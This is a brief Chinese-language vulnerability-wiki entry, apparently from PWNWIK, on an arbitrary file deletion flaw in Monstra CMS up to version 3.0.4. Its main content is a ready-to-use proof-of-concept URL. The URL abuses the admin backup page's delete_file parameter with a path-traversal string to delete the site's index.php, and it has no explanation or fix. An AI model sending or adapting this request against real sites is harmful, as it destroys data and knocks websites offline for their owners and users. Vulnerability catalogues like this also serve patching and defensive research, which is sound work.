Loading
0

Monstra CMS 任意文件删除漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

漏洞影响

Monstra CMS <= 3.0.4

POC

http://<target>/admin/index.php?id=backup&delete_file=/.......//./.......//./index.php&token=f62369587a94433bb2c3c00264e8705171c6189f

PWNWIK.COM==免费、自由、人人可编辑的漏洞库